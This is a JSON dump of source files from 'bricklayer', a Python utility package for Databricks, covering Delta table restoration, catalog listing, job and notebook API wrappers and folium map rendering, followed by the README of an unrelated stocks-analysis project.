[ { "alpha_fraction": 0.6010442972183228, "alphanum_fraction": 0.6014676690101624, "avg_line_length": 37.721309661865234, "blob_id": "225cddf0a62a1c7d631d326a94b82f236fab2295", "content_id": "0aae980607e2f44fd7ca496a50828a245c6be89b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7086, "license_type": "permissive", "max_line_length": 124, "num_lines": 183, "path": "/bricklayer/catalog/crawler.py", "repo_name": "mao-liu/bricklayer", "src_encoding": "UTF-8", "text": "\"\"\"\n delta_tables crawlers\n two functions supported\n - restore delta tables from delta_log location\n - update existing delta table from delta_log location\n ```\n\"\"\"\n\nimport typing\nimport logging\nfrom pathlib import Path\nfrom pyspark.sql import SparkSession\nfrom . import dbricks_catalog\n\nclass Crawler():\n\n def __init__(self):\n self.spark = SparkSession.builder.getOrCreate()\n\n def restore_delta_tables(\n self,\n dbfs_path: str,\n table_names: typing.Iterable[str] = None,\n prefixes: typing.Iterable[str] = None\n ) -> None:\n \"\"\"recreate delta tables for all delta_log/ path which was found in the target directory\n Args:\n dbfs_path (str): relative path to dbfs/ in which save the delta table data\n tables (typing.Iterable[str], optional): tables(table_sql_name) to be restored\n prefixes (typing.Iterable[str], optional): prefix of tables to be relocated.\n If `talbe_names` and `prefixes` are using at the same time, only `table_names` start with `prefixes` will in\n \"\"\"\n if isinstance(table_names, str):\n table_names = [table_names]\n\n if isinstance(prefixes, str):\n prefixes = [prefixes]\n\n logging.info(f'Input `dbfs_path`: {dbfs_path}')\n dbfs_path = dbfs_path.strip('/')\n abs_path = Path(f'/dbfs/{dbfs_path}')\n logging.info(f'Absolute full path of the directory: {str(abs_path)}')\n\n if not table_names:\n table_names = self._get_all_tables_from_dbfs_path(abs_path)\n\n if prefixes:\n logging.debug(f'table_names before filtering: {table_names}')\n table_names = self._filter_tables_by_prefixes(table_names, prefixes)\n logging.debug(f'table_names after filtering: {table_names}')\n\n if not table_names:\n logging.warn('Cannot find any qualified table to restore')\n return\n\n success_paths = []\n failure_paths = []\n for t in table_names:\n table_name, version = t.split('_version_')\n table_location_path = f'/{dbfs_path}/{table_name}/version={version}'\n if self._create_delta_table(t, table_location_path):\n success_paths.append(table_location_path)\n else:\n failure_paths.append(table_location_path)\n logging.info(f\"Restoring successful: {success_paths}\")\n logging.info(f\"Restoring failed: {failure_paths}\")\n\n def _create_delta_table(self, table_sql_name: str, table_location_path: str) -> bool:\n sql = f\"\"\"\n CREATE TABLE {table_sql_name}\n USING DELTA \n LOCATION '{table_location_path}'\n \"\"\"\n\n if Path(f'/dbfs{table_location_path}/_delta_log').exists():\n self.spark.sql(sql)\n logging.info(f'Restoring delta table for {table_sql_name} at {table_location_path} SUCCESS')\n return True\n else:\n logging.debug(f'`/dbfs{table_location_path}/_delta_log` doesn\\'t exist')\n logging.debug(f'Restoring delta table for {table_sql_name} at {table_location_path} FAILED')\n return False\n\n def relocate_delta_tables(\n self,\n dbfs_path: str,\n table_names: typing.Iterable[str] = None,\n prefixes: typing.Iterable[str] = None\n ) -> None:\n \"\"\"update the location url for all tables which could be retrieved by Databricks sql\n 
Args:\n dbfs_path (str): working directory in which save the delta table data\n table_names (typing.Iterable[str], optional): tables to be relocated\n prefixes (typing.Iterable[str], optional): prefix of tables to be relocated.\n If `talbe_names` and `prefixes` are using at the same time, only `table_names` start with `prefixes` will in\n \"\"\"\n if isinstance(table_names, str):\n table_names = [table_names]\n\n if isinstance(prefixes, str):\n prefixes = [prefixes]\n\n logging.info(f'Input `dbfs_path`: {dbfs_path}')\n dbfs_path = dbfs_path.strip('/')\n\n if not table_names:\n table_names = self._get_all_tables_from_dbs_catalog()\n\n if prefixes:\n logging.debug(f'table_names before filtering: {table_names}')\n table_names = self._filter_tables_by_prefixes(table_names, prefixes)\n logging.debug(f'table_names after filtering: {table_names}')\n\n if not table_names:\n logging.warn('Cannot find any qualified table to relocate')\n return\n\n success_tables = []\n failure_tables = []\n for t in table_names:\n table_name, version = t.split('_version_')\n table_new_location_path = f'/{dbfs_path}/{table_name}/version={version}'\n if self._update_delta_table_location(t, table_new_location_path):\n success_tables.append(t)\n else:\n failure_tables.append(t)\n logging.info(f\"Relocating successful: {success_tables}\")\n logging.info(f\"Relocating failed: {failure_tables}\")\n\n def _update_delta_table_location(self, table_sql_name: str, table_new_location_path: str) -> bool:\n sql = f\"\"\"\n ALTER TABLE {table_sql_name}\n SET LOCATION '{table_new_location_path}'\n \"\"\"\n\n if Path(f'/dbfs{table_new_location_path}/_delta_log').exists():\n self.spark.sql(sql)\n logging.info(f'Relocating delta table for {table_sql_name} to {table_new_location_path} SUCCESS')\n return True\n else:\n logging.debug(f'`/dbfs{table_new_location_path}/_delta_log` doesn\\'t exist')\n logging.debug(f'Relocating delta table for {table_sql_name} to {table_new_location_path} FAILED')\n return False\n\n def _get_all_tables_from_dbs_catalog(self):\n return [\n table.sql_name\n for db in dbricks_catalog.DbricksCatalog().get_databases()\n for table in db.get_tables()\n if not table.is_view\n ]\n\n def _get_all_tables_from_dbfs_path(self, abs_path: str):\n return [\n f\"{p.relative_to(abs_path).parts[0]}_version_{p.relative_to(abs_path).parts[1].split('version=')[1]}\"\n for p in abs_path.glob('*.*/version=*/_delta_log/')\n ]\n\n def _filter_tables_by_prefixes(\n self,\n table_names: typing.Iterable[str],\n prefixes: typing.Iterable[str]\n ) -> typing.Iterable[str]:\n return [\n table_name\n for prefix in prefixes\n for table_name in table_names\n if table_name.startswith(prefix)\n ]\n\ndef restore_delta_tables(\n dbfs_path: str,\n table_names: typing.Iterable[str] = None,\n prefixes: typing.Iterable[str] = None\n ):\n Crawler().restore_delta_tables(dbfs_path, table_names, prefixes)\n\ndef relocate_delta_tables(\n dbfs_path: str,\n table_names: typing.Iterable[str] = None,\n prefixes: typing.Iterable[str] = None\n ):\n Crawler().relocate_delta_tables(dbfs_path, table_names, prefixes)\n" }, { "alpha_fraction": 0.634441077709198, "alphanum_fraction": 0.634441077709198, "avg_line_length": 21.066667556762695, "blob_id": "7acc68c9a21bb9bf6c751805d1d85bdcfbdc0925", "content_id": "3efc7656abc5c1c6e7c10207c246de59835de3ff", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 331, "license_type": "permissive", "max_line_length": 64, "num_lines": 15, "path": "/makefile", 
"repo_name": "mao-liu/bricklayer", "src_encoding": "UTF-8", "text": "# short commit hash\nGIT_COMMIT=`git rev-parse --short HEAD`\n\n.DEFAULT_GOAL := help\n\nhelp:\n\t@echo \"Build targets:\"\n\t@echo \"- clean: cleans the build directory\"\n\t@echo \"- build_wheel: \t\tbuilds wheel package locally\"\n\nclean:\n\trm -rf build/*; rm -rf dist/*\n\nbuild_wheel:\n\tpython setup.py sdist bdist_wheel\n" }, { "alpha_fraction": 0.6643962860107422, "alphanum_fraction": 0.665015459060669, "avg_line_length": 28.907407760620117, "blob_id": "36426794ced04f841805cbd41d6ac79ea439f069", "content_id": "1e71584d65208b907d9ae8f0bcbaf0d66ed27422", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1615, "license_type": "permissive", "max_line_length": 89, "num_lines": 54, "path": "/bricklayer/__init__.py", "repo_name": "mao-liu/bricklayer", "src_encoding": "UTF-8", "text": "import json\nimport logging\nimport sys\nfrom logging import NullHandler\n\n# Set default logging handler to avoid \"No handler found\" warnings.\nlogging.getLogger(__name__).addHandler(NullHandler())\nlogging.getLogger(\"py4j\").setLevel(logging.ERROR)\nlogging.basicConfig(\n level='INFO',\n stream=sys.stdout,\n format='[{levelname}] [{asctime}] [{name}] [{module}.{funcName}] {message}',\n style='{'\n)\n\ndef get_dbutils(spark):\n from pyspark.dbutils import DBUtils\n return DBUtils(spark)\n\ndef get_spark():\n from pyspark.sql import SparkSession\n return SparkSession.builder.getOrCreate()\n\nclass NotebookContext():\n\n def __init__(self):\n dbutils = get_dbutils(get_spark())\n self._context = dbutils.notebook.entry_point.getDbutils().notebook().getContext()\n self._context_tags = json.loads(self._context.toJson()).get('tags')\n\n def get_run_id(self):\n \"\"\"Return the current run id\"\"\"\n return self._context.currentRunId().toString()\n\n def get_api_token(self):\n \"\"\"Return the token id\"\"\"\n return self._context.apiToken().value()\n\n def get_browser_host_name(self):\n \"\"\"Return the notebook host name\"\"\"\n return self._context_tags.get('browserHostName')\n\n def get_browser_host_name_url(self):\n \"\"\"Return the notebook url host name\"\"\"\n return f'https://{self.get_browser_host_name()}'\n\n def get_notebook_path(self):\n return self._context.notebookPath().value()\n \n def get_notebook_cluster_id(self):\n return self._context.clusterId().value()\n\ndef get_notebook_context():\n return NotebookContext()\n" }, { "alpha_fraction": 0.8148148059844971, "alphanum_fraction": 0.8148148059844971, "avg_line_length": 25.5, "blob_id": "1922ae0f0ef9f4d9fb1112071e28b30261f99fc8", "content_id": "390a3fc1e595fec7ad0dffc59089acb242f03c91", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 54, "license_type": "permissive", "max_line_length": 39, "num_lines": 2, "path": "/README.md", "repo_name": "mao-liu/bricklayer", "src_encoding": "UTF-8", "text": "# bricklayer\nGeneral utilities to work in Databricks\n\n" }, { "alpha_fraction": 0.5346433520317078, "alphanum_fraction": 0.5359470844268799, "avg_line_length": 32.767295837402344, "blob_id": "bf776dec36a16060aed4ea2cb6c7cd6f55c4c561", "content_id": "08db29be226ea446166103987b3f756b76ccd609", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10738, "license_type": "permissive", "max_line_length": 109, "num_lines": 318, "path": "/bricklayer/api/__init__.py", "repo_name": 
"mao-liu/bricklayer", "src_encoding": "UTF-8", "text": "\"\"\"\n Wrappers for databricks_cli api and bring some sanity back with namespaces.\n Usage:\n ```\n import DBSApi\n # export notebook\n db = DBSApi()\n db.export_notebook(\n source_path='/Repos/deploy/dac-dbs-volume-projection-validation/02_validation_notebooks/90_run_vp_6',\n target_path= '/dbfs/mnt/external/tmp/90_run_vp_6'\n )\n # To save the current notebook to the runs folder\n db.export_current_notebook_run()\n ```\n\"\"\"\n\nimport pathlib\nimport random\nimport datetime\nimport json\n\nimport requests\nfrom databricks_cli.workspace.api import WorkspaceApi\nfrom databricks_cli.jobs.api import JobsApi\nfrom databricks_cli.sdk import ApiClient\nfrom databricks_cli.sdk import JobsService\nfrom databricks_cli.clusters.api import ClusterApi\nfrom databricks_cli.runs.api import RunsApi\n\nfrom .. import get_notebook_context\n\nclass DBJobRun(object):\n '''Wrapper for a Job Run'''\n\n def __init__(self, job, run_id, client):\n self.job = job\n self.run_id = run_id\n self._client = client\n\n @property\n def data(self):\n '''Return the data from the raw API call'''\n return RunsApi(self._client).get_run(self.run_id)\n\n @property\n def result_state(self):\n return self.data['state'].get('result_state')\n\n @property\n def life_cycle_state(self):\n \"\"\"Can be PENDING, RUNNING or TERMINATED\"\"\"\n return self.data['state'].get('life_cycle_state')\n\n @property\n def state_message(self):\n return self.data['state'].get('state_message')\n\n @property\n def run_page_url(self):\n '''Return the URL of the run in the datbricks API'''\n return self.data['run_page_url']\n\n @property\n def attempt_number(self):\n return self.data['attempt_number']\n\n def get_run_output(self):\n '''Return the output of the job as defined in the\n job notebook with a call to `dbutils.notebook.exit` function'''\n data = RunsApi(self._client).get_run_output(self.run_id)\n return data.get('notebook_output')\n\nclass DBJob(object):\n '''Wrapper for a Job Run'''\n def __init__(self, job_id, client):\n self.job_id = job_id\n self._client = client\n self.runs = []\n\n def run_now(self, jar_params=None, notebook_params=None, python_params=None,\n spark_submit_params=None):\n \"\"\"Run this job.\n :param jar_params: list of jars to be included\n :param notebook_params: map (dict) with the params to be passed to the job\n :param python_params: To pa passed to the notebook as if they were command-line parameters\n :param spark_submit_params: A list of parameters for jobs with spark submit task as command-line\n parameters.\n \"\"\"\n data = JobsApi(self._client).run_now(\n self.job_id,\n jar_params=jar_params,\n notebook_params=notebook_params,\n python_params=python_params,\n spark_submit_params=spark_submit_params\n )\n run = DBJobRun(self, data['run_id'], self._client)\n self.runs.append(run)\n return run\n\n def stop(self):\n \"Stop this job.\"\n for run in self.runs:\n JobsService(self._client).client.perform_query(\n 'POST', '/jobs/runs/cancel', data={\n \"run_id\": run.run_id\n }\n )\n\n\nclass DBSApi(object):\n\n def __init__(\n self,\n token=None,\n host=None,\n apiVersion='2.0',\n ):\n if token is None:\n token = get_notebook_context().get_api_token()\n\n if host is None:\n host = get_notebook_context().get_browser_host_name_url()\n\n self._client = ApiClient(\n host=host,\n apiVersion=apiVersion,\n token=token\n )\n\n def export_notebook(self, source_path, target_path, fmt='DBC', is_overwrite=False):\n \"Export a notebook to a local file\"\n (\n 
WorkspaceApi(self._client)\n .export_workspace(\n source_path,\n target_path,\n fmt,\n is_overwrite\n )\n )\n\n def import_notebook(self, source_path, target_path, language='PYTHON', fmt='DBC', is_overwrite=False):\n \"Import a notebook from a local file\"\n (\n WorkspaceApi(self._client)\n .import_workspace(\n source_path,\n target_path,\n language,\n fmt,\n is_overwrite\n )\n )\n\n def mkdir(self, dir_path):\n \"Create a dir in the workspace\"\n (\n WorkspaceApi(self._client)\n .mkdirs(\n dir_path\n )\n )\n\n def backup_notebook(self, source_path, target_path, fmt=\"DBC\"):\n \"Backup a notebook to another place in the workspace\"\n tmp_dir = '/dbfs/tmp/'\n tmp_name = 'backup'\n intermediate_location = pathlib.Path(tmp_dir).joinpath(tmp_name)\n self.export_notebook(source_path, intermediate_location.as_posix(), fmt)\n try:\n self.import_notebook(intermediate_location, target_path, fmt)\n finally:\n intermediate_location.unlink()\n\n def export_current_notebook_run(self, target_path, fmt=\"DBC\"):\n \"\"\"Save the current notebook to a given location in the required format (default DBC)\n and preserving the path and timestamp.\n Formats allowed:\n SOURCE : The notebook will be imported/exported as source code.\n HTML : The notebook will be imported/exported as an HTML file.\n JUPYTER: The notebook will be imported/exported as a Jupyter/IPython Notebook file.\n DBC\t : The notebook will be imported/exported as Databricks archive format.\n \"\"\"\n current_path = get_notebook_context().get_notebook_path()\n timestamp = datetime.datetime.now().strftime('%Y%m%d%H%M%S')\n target_path = (\n pathlib.Path(target_path)\n .joinpath(current_path[1:])\n .joinpath(timestamp)\n )\n try:\n self.backup_notebook(current_path, target_path.as_posix(), fmt)\n except requests.exceptions.HTTPError as _e:\n error_code = _e.response.json()['error_code']\n if error_code == 'RESOURCE_DOES_NOT_EXIST':\n self.mkdir(target_path.parent.as_posix())\n self.backup_notebook(current_path, target_path.as_posix(), fmt)\n else:\n raise\n\n def create_job(self, notebook_path, job_name=None, cluster_name=None,\n cluster_id=None, notifications_email=None):\n \"\"\"Create a databricks job.\n :param notebook_path: The path of the notebook to be run in the job, can be relative\n :param job_name: Name of the job to be run, if missing it will use the notebook_path\n :param cluster_name: If provided the job will run in the cluster with this name\n :param cluster_id: If provided the job will run in the cluster with this id (should not\n be provided at the same time with cluster_name)\n :param notifications_email: If provided notifications on success or failure on the job run\n will be sent to this email address.\n\n Examples\n --------\n ```\n job = DBSApi().create_job('./dummy_job')\n job.run_now()\n #\n job = DBSApi().create_job('./dummy_job',cluster_name='Shared Writer')\n run = job.run_now(notebook_params={'PARAM':'PARAM_VALUE'})\n #\n # Example on how to run jobs with a max number of concurrent runs\n # this can help when we have capacity limits in cpu in the infrastructure side\n import time\n NUM_JOBS_TO_RUN = 6\n MAX_CONCURRENT_JOBS = 3\n jobs_to_run = [\n DBSApi().create_job('./dummy_job') for x in range(NUM_JOBS_TO_RUN)\n ]\n runs = []\n while True:\n running_runs = list(filter(lambda r:r.life_cycle_state !='TERMINATED', runs))\n print(f'running runs:{len(running_runs)}')\n if len(running_runs) < MAX_CONCURRENT_JOBS:\n if not jobs_to_run:\n break\n job_to_run = jobs_to_run.pop()\n new_run = job_to_run.run_now()\n 
runs.append(new_run)\n else:\n time.sleep(2)\n ```\n \"\"\"\n if cluster_name:\n assert cluster_id is None\n _cluster_id = ClusterApi(self._client).get_cluster_id_for_name(cluster_name)\n elif cluster_id:\n _cluster_id = cluster_id\n else:\n _cluster_id = get_notebook_context().get_notebook_cluster_id()\n\n if job_name:\n _job_name = job_name\n else:\n _job_name = notebook_path\n\n\n if not pathlib.Path(notebook_path).is_absolute():\n notebook_path = (\n pathlib\n .Path(get_notebook_context().get_notebook_path())\n .parent\n .joinpath(notebook_path)\n .as_posix()\n )\n\n _json = (\n {\n \"name\": _job_name,\n \"existing_cluster_id\": _cluster_id,\n \"notebook_task\": {\n \"notebook_path\": notebook_path\n },\n \"email_notifications\": {\n \"on_success\": [\n notifications_email\n ],\n \"on_failure\": [\n notifications_email\n ]\n }\n }\n )\n jobdata = JobsApi(self._client).create_job(_json)\n return DBJob(\n jobdata['job_id'],\n self._client\n )\n\n def list_jobs(self, job_name='', job_id=''):\n \"\"\"List all jobs with job name or job id\n \"\"\"\n jobs = []\n _jobs = JobsApi(self._client).list_jobs()['jobs']\n\n if job_name:\n result = list(\n filter(\n lambda job:\n job_name in job['settings']['name'],\n _jobs\n ))\n\n if job_id:\n result = list(\n filter(\n lambda job:\n job_id in job['job_id'],\n _jobs\n ))\n\n for jobdata in result:\n job = DBJob(\n jobdata['job_id'],\n self._client\n )\n jobs.append(job)\n\n return jobs\n" }, { "alpha_fraction": 0.5970418453216553, "alphanum_fraction": 0.5995671153068542, "avg_line_length": 30.86206817626953, "blob_id": "8491e3b73e7b449396fd9f20f2e2458b5ed856db", "content_id": "2076af71d2248628800530d3d5079890b7174005", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2772, "license_type": "permissive", "max_line_length": 98, "num_lines": 87, "path": "/bricklayer/catalog/dbricks_catalog.py", "repo_name": "mao-liu/bricklayer", "src_encoding": "UTF-8", "text": "\"\"\"Module to access the databricks catalog\"\"\"\n\nfrom typing import Iterator\nfrom pyspark.sql.utils import AnalysisException\nfrom pyspark.sql import SparkSession\n\nclass DbricksTable:\n \"\"\"A table found in the databricks catalog\"\"\"\n def __init__(self, database_name, table_name , table_version, info, spark):\n self.database_name = database_name\n self.table_name = table_name\n self.table_version = table_version\n self.spark = spark\n self.info = info\n\n @property\n def table_created_time(self):\n return self.info.get('Created Time')\n\n @property\n def table_type(self):\n return self.info.get('Type')\n\n @property\n def table_provider(self):\n return self.info.get('Provider')\n\n @property\n def table_location(self):\n return self.info.get('Location')\n\n @property\n def is_view(self):\n return self.table_type == 'VIEW'\n\n @property\n def sql_name(self):\n \"\"\"Name of the table as used in SQL\"\"\"\n return f\"{self.database_name}.{self.table_name}_version_{self.table_version}\"\n\nclass DbricksDatabase:\n \"\"\"Database found in the databricks catalog\"\"\"\n \n RELEVANT_TABLE_INFO = {'Created Time', 'Type', 'Provider', 'Location'}\n\n def __init__(self, name, spark):\n self.name = name\n self.spark = spark\n\n def get_tables(self) -> Iterator[DbricksTable]:\n \"\"\"Generator to iterate over the databricks tables\"\"\"\n for table_row in self.spark.sql(f\"SHOW TABLE EXTENDED IN {self.name} LIKE '*'\").collect():\n info = self._parse_extended_info(table_row.information)\n yield DbricksTable(\n self.name,\n 
table_row.tableName.split('_version_')[0],\n table_row.tableName.split('_version_')[-1],\n info=info,\n spark=self.spark\n )\n\n def _parse_extended_info(self, info):\n result = {}\n for line in info.split('\\n'):\n line_parts = line.split(':', maxsplit=1)\n if len(line_parts) > 1:\n if line_parts[0] in self.RELEVANT_TABLE_INFO:\n result[line_parts[0]] = line_parts[1].strip()\n return result\n\n\n def __repr__(self):\n return f\"{self.__class__.__name__}:{self.name}\"\n\nclass DbricksCatalog:\n \"\"\"Databricks catalog\"\"\"\n\n def __init__(self, spark=None):\n if spark is None:\n self.spark = SparkSession.builder.getOrCreate()\n else:\n self.spark = spark\n\n def get_databases(self) -> Iterator[DbricksDatabase]:\n \"\"\"Iterator over all the databases in the databricks catalog\"\"\"\n for db_row in self.spark.sql('SHOW DATABASES').collect():\n yield DbricksDatabase(db_row.databaseName, spark=self.spark)\n" }, { "alpha_fraction": 0.6361221671104431, "alphanum_fraction": 0.642762303352356, "avg_line_length": 27.961538314819336, "blob_id": "580c3d8483d0561a1dbe34d356c25e1cf27f3be8", "content_id": "4a86e2447566f1104cbb9a3368119c09a08e58b8", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 753, "license_type": "permissive", "max_line_length": 56, "num_lines": 26, "path": "/setup.py", "repo_name": "mao-liu/bricklayer", "src_encoding": "UTF-8", "text": "import setuptools\n\nwith open('bricklayer/__version__.py') as fd:\n version = fd.read().split('=')[1].strip().strip(\"'\")\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"bricklayer\",\n version=version,\n author=\"Intelematics\",\n description=\"Internal Databricks utils\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/intelematics/bricklayer\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.6',\n install_requires=[\n 'databricks_cli', 'shapely', 'folium'\n ]\n)\n" }, { "alpha_fraction": 0.5715256929397583, "alphanum_fraction": 0.5732934474945068, "avg_line_length": 37.91005325317383, "blob_id": "e4d0378288a9ba57fd81f9cdc15376bf1b5dd841", "content_id": "945322ab6b7812606eef915aaf039328a09542da", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7354, "license_type": "permissive", "max_line_length": 145, "num_lines": 189, "path": "/bricklayer/display/map/__init__.py", "repo_name": "mao-liu/bricklayer", "src_encoding": "UTF-8", "text": "''' Module to display a folium map in databricks notebooks'''\nimport math\n\nimport pyspark\nfrom pyspark.sql import SparkSession\n\nimport pandas as pd\nimport folium\n\nimport shapely.wkt as wkt\nimport shapely.geometry\nimport shapely.geometry.base\n\n\nclass Layer():\n ''' Layer to be rendered in the map '''\n\n def __init__(self, data, geometry_col=None, popup_attrs=False, color='red',\n weight=None, radius=1):\n \"\"\"\n Args:\n data (*): pandas dataframe, or a geodataframe or a spark dataframe or a databricks SQL query.\n popup_attrs (list): the attributes used to populate a pop up, if False there will be no popup. If True it will put all the attrs.\n color (str): Color to render the layer. Color name or RGB. (i.e. '#3388ff')\n weight (int): Width of the stroke when rendering lines or points. 
Defaults to 1.\n            radius (int): Radius of the circles used for points. Defaults to 1.\n\n        Returns:\n            folium.Map: Folium map to be rendered.\n        \"\"\"\n        dataframe = self.get_dataframe(data)\n        if dataframe.empty:\n            raise ValueError('No data to display')\n        self.geometry_col = self.get_geometry_col(geometry_col, dataframe)\n        self.dataframe = self.get_dataframe_with_geom(dataframe, self.geometry_col)\n        self.centroid = self.get_centroid(self.dataframe, self.geometry_col)\n        self.popup_attrs = popup_attrs\n        self.color = color\n        self.weight = weight\n        self.radius = radius\n\n    def get_geometry_col(self, geometry_col: str, dataframe: pd.DataFrame):\n        '''Return the name of the geometry column'''\n        if geometry_col is not None:\n            if geometry_col not in dataframe.columns:\n                raise ValueError(f\"Column {geometry_col} not found in data columns\")\n            return geometry_col\n        else:\n            candidates = []\n            for column in dataframe.columns:\n                if 'geom' in column:\n                    candidates.append(column)\n                elif 'geography' in column:\n                    candidates.append(column)\n                elif 'wkt' in column:\n                    candidates.append(column)\n            if len(candidates) > 1:\n                raise ValueError(\"Specify the geometry_col argument for the data\")\n            return candidates[0]\n\n    def get_dataframe(self, data)->pd.DataFrame:\n        '''Get the data in a pandas DataFrame'''\n        if isinstance(data, pd.DataFrame):\n            return data.copy()\n        if isinstance(data, pyspark.sql.dataframe.DataFrame):\n            return data.toPandas()\n        if isinstance(data, str):\n            spark = SparkSession.builder.getOrCreate()\n            return spark.sql(data).toPandas()\n        raise NotImplementedError(f\"Can't interpret data with type {type(data)}\")\n\n    def get_dataframe_with_geom(self, dataframe: pd.DataFrame, geometry_col: str):\n        '''Convert the geometry column to a shapely geometry'''\n        geom = dataframe.iloc[0][geometry_col]\n        if isinstance(geom, str):\n            dataframe[geometry_col] = dataframe[geometry_col].apply(wkt.loads)\n            return dataframe\n        if isinstance(geom, shapely.geometry.base.BaseGeometry):\n            return dataframe\n        raise ValueError(f\"Invalid type for geometry_col in the data ({type(geom)})\")\n\n    def get_centroid(self, dataframe: pd.DataFrame, geometry_col: str):\n        '''Get the centroid of all the geometries in the layer'''\n        centroids = [r.centroid for _, r in dataframe[geometry_col].items()]\n        multipoint = shapely.geometry.MultiPoint(centroids)\n        return multipoint.centroid\n\n    def get_popup(self, row: pd.Series):\n        '''Get a folium pop-up with the requested attributes'''\n        if isinstance(self.popup_attrs, list):\n            non_geom_cols = self.popup_attrs\n        else:\n            non_geom_cols = list(self.dataframe.columns)\n            non_geom_cols.remove(self.geometry_col)\n\n        return folium.Popup((\n            row\n            [non_geom_cols]\n            .to_frame()\n            .to_html()\n        ))\n\n    def get_map_geom(self, row: pd.Series):\n        '''Get folium geometry from the shapely geom'''\n        sgeom = row[self.geometry_col]\n        kwargs = {'color': self.color}\n        if self.popup_attrs:\n            html_popup = self.get_popup(row)\n        else:\n            html_popup = None\n        if self.weight is not None:\n            kwargs['weight'] = self.weight\n        if isinstance(sgeom, shapely.geometry.LineString):\n            coords = [(y, x) for x,y in sgeom.coords]\n            fgeom = folium.PolyLine(\n                coords,\n                **kwargs\n            )\n        elif isinstance(sgeom, shapely.geometry.Point):\n            kwargs['radius'] = self.radius\n            coords = [(y, x) for x,y in sgeom.coords]\n            fgeom = folium.CircleMarker(\n                coords[0],\n                **kwargs\n            )\n        else:\n            raise NotImplementedError(f'Geometry type not supported {type(sgeom)}')\n        if html_popup:\n            fgeom.add_child(html_popup)\n        return fgeom\n\n    def get_bounds(self):\n        '''Get the 
bounds for all the geometries'''\n minx, miny, maxx, maxy = None, None, None, None\n geoms_bounds = self.dataframe[self.geometry_col].apply(lambda g:g.bounds)\n for _minx, _miny, _maxx, _maxy in geoms_bounds:\n if minx is None:\n minx, miny, maxx, maxy = _minx, _miny, _maxx, _maxy\n else:\n minx = min(minx, _minx)\n miny = min(miny, _miny)\n maxx = max(maxx, _maxx)\n maxy = max(maxy, _maxy)\n return minx, miny, maxx, maxy\n\n def render_to_map(self, folium_map):\n '''Render the layer into the map'''\n for _, row in self.dataframe.iterrows():\n map_geom = self.get_map_geom(row)\n map_geom.add_to(folium_map)\n\nclass Map():\n '''Map that can render layers'''\n\n def __init__(self, layers: list, **map_args):\n self.layers = layers\n self.map_args = map_args.copy()\n self.map_args['zoom_start'] = self.map_args.get('zoom_start', 13)\n\n def get_centroid(self):\n '''Get the centroid of all the layers'''\n centroids = [layer.centroid for layer in self.layers]\n multipoint = shapely.geometry.MultiPoint(centroids)\n return multipoint.centroid\n\n def get_bounds(self):\n '''Get the bounds of all the layers'''\n minx, miny, maxx, maxy = None, None, None, None\n for layer in self.layers:\n _minx, _miny, _maxx, _maxy = layer.get_bounds()\n if minx is None:\n minx, miny, maxx, maxy = _minx, _miny, _maxx,_maxy\n else:\n minx = min(minx, _minx)\n miny = min(miny, _miny)\n maxx = max(maxx, _maxx)\n maxy = max(maxy, _maxy)\n return minx, miny, maxx, maxy\n\n def render(self):\n '''Render the map'''\n map_centroid = self.get_centroid()\n folium_map = folium.Map(\n [map_centroid.y,map_centroid.x],\n **self.map_args\n )\n for layer in self.layers:\n layer.render_to_map(folium_map)\n return folium_map\n" }, { "alpha_fraction": 0.7884615659713745, "alphanum_fraction": 0.7884615659713745, "avg_line_length": 25, "blob_id": "30da7b5b4de56b63000f15afc575cb07e364d82c", "content_id": "d69301e84ea1b27ffc00b467994f4d112a90d17e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 52, "license_type": "permissive", "max_line_length": 29, "num_lines": 2, "path": "/bricklayer/catalog/__init__.py", "repo_name": "mao-liu/bricklayer", "src_encoding": "UTF-8", "text": "from . import dbricks_catalog\nfrom . import crawler\n" } ]
9
manikpurivibhu/Stocks-Analysis
https://github.com/manikpurivibhu/Stocks-Analysis
9829b55e3af458ac8abb8147baacdb218aeb23c3
ae69b814b12034dae1e527802382c1eb037da037
4afad80ebc401a099e5045cb0d1020ccdd62c9a9
refs/heads/master
2023-04-18T17:36:36.068713
2021-05-03T11:26:48
2021-05-03T11:26:48
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7220744490623474, "alphanum_fraction": 0.7327127456665039, "avg_line_length": 23.25806427001953, "blob_id": "53b89d84a29d06c74922d793eec51a4a6204d974", "content_id": "00feaaf08c80a790e000a4f63a676ec37d9b8e23", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 752, "license_type": "no_license", "max_line_length": 131, "num_lines": 31, "path": "/README.md", "repo_name": "manikpurivibhu/Stocks-Analysis", "src_encoding": "UTF-8", "text": "# Stocks Analysis\n\n \n This GUI application prompts for Stock Ticker and range of dates and analyzes and visualizes Historical Stock Data of said ticker.\n This Project was made using Python and it's libraries including but not limited to Pandas, Matplotlib and Tkinter.\n \n \n # INSTRUCTION\n \n To run this file,dowload [exe](https://github.com/vibhu-exe/Stocks-Analysis) in your pc :computer:\n and install it on your local device\n \n # Thank You For Downloading The Project :smile:\n \n # :hearts:\n \n # SCREENSHOTS\n\n1.)Home Page\n ![o1](dist/images/Home%20Page.JPG)\n \n 1.1)Home Page (alternate inputs)\n ![](dist/images/Home.JPG)\n \n2.)Analysis\n ![](dist/images/Analysis.JPG)\n\n3.)Visualization\n ![](dist/images/Visualization.JPG)\n \n ![](dist/images/Visual.JPG)\n" }, { "alpha_fraction": 0.6072845458984375, 